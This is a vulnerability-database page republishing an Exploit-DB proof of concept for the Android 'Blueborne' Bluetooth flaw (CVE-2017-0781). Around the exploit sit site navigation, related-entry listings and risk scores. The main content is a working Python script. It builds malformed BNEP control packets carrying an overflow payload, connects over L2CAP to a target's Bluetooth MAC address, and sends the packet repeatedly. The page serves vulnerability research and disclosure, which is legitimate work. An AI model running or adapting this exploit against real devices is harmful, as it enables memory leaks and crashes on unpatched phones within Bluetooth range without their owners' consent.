Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Android Bluetooth - 'Blueborne' Information Leak (1)

🗓️ 09 Aug 2017 00:00:00Reported by Kert OjasooType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 126 Views

Android Bluetooth 'Blueborne' Information Leak exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today		LineageOS 14.1 Blueborne - Remote Code Execution Vulnerability
7 Apr 201800:00
zdt
0day.today		Android Bluetooth - Blueborne Information Leak (1) Exploit
29 Apr 201800:00
zdt
GithubExploit		Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Google Android
22 Sep 201722:03
githubexploit
GithubExploit		Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Google Android
21 Mar 202607:17
githubexploit
Gitee		Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Google Android
27 Jul 202504:17
gitee
Gitee		Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Google Android
6 Sep 202511:51
gitee
android		CVE-2017-0781
1 Sep 201700:00
android
Circl		CVE-2017-0781
15 Nov 201723:04
circl
CNVD		Android BNEP Remote Code Execution Vulnerability
13 Sep 201700:00
cnvd
CVE		CVE-2017-0781
14 Sep 201719:00
cve
Rows per page
from pwn import *
import bluetooth

if not 'TARGET' in args:
    log.info('Usage: python CVE-2017-0781.py TARGET=XX:XX:XX:XX:XX:XX')
    exit()

target = args['TARGET']

count = 30 # Amount of packets to send

port = 0xf # BT_PSM_BNEP
context.arch = 'arm'
BNEP_FRAME_CONTROL = 0x01
BNEP_SETUP_CONNECTION_REQUEST_MSG = 0x01

def set_bnep_header_extension_bit(bnep_header_type):
    """
    If the extension flag is equal to 0x1 then
    one or more extension headers follows the BNEP
    header; If extension flag is equal to 0x0 then the
    BNEP payload follows the BNEP header.
    """
    return bnep_header_type | 128

def bnep_control_packet(control_type, control_packet):
    return p8(control_type) + control_packet

def packet(overflow):
    pkt = ''
    pkt += p8(set_bnep_header_extension_bit(BNEP_FRAME_CONTROL))
    pkt += bnep_control_packet(BNEP_SETUP_CONNECTION_REQUEST_MSG, '\x00' + overflow)
    return pkt

bad_packet = packet('AAAABBBB')

log.info('Connecting...')
sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
bluetooth.set_l2cap_mtu(sock, 1500)
sock.connect((target, port))

log.info('Sending BNEP packets...')
for i in range(count):
    sock.send(bad_packet)

log.success('Done.')
sock.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Aug 2017 00:00Current
8.3High risk
Vulners AI Score8.3
CVSS 28.3
CVSS 38.8
EPSS0.42427
androidbluetoothblueborneinformation leakexploitcve-2017-0781bneppacket sending
126